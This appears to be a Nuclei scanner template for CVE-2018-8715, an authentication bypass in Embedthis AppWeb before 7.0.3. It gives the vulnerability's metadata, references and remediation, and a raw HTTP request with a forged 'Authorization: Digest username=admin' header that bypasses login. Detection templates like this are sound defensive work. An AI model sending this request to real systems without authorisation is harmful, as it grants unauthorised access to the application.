id: CVE-2018-8715 info: name: AppWeb - Authentication Bypass author: milo2012 severity: high description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. impact: | Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the application. remediation: | Apply the necessary patches or updates provided by the vendor to fix the authentication bypass vulnerability in AppWeb. reference: - https://github.com/embedthis/appweb/issues/610 - https://blogs.securiteam.com/index.php/archives/3676 - https://security.paloaltonetworks.com/CVE-2018-8715 - https://nvd.nist.gov/vuln/detail/CVE-2018-8715 - https://github.com/cyberharsh/appweb classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2018-8715 cwe-id: CWE-287 epss-score: 0.00927 epss-percentile: 0.8261 cpe: cpe:2.3:a:embedthis:appweb:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: embedthis product: appweb tags: cve,cve2018,appweb,auth-bypass,embedthis http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Authorization: Digest username=admin matchers-condition: and matchers: - type: word part: body words: - '' - type: status status: - 200 # digest: 490a00463044022005d455efc5652978e6ce03467a2fdc9063fa8b000a45eafb0302fc5d0bd2237902205f0c0f61bf8b26e05992a876e05e7b5191f3ca30dc15e835eb036d08ee54b69d:922c64590222798bb761d5b6d8e72950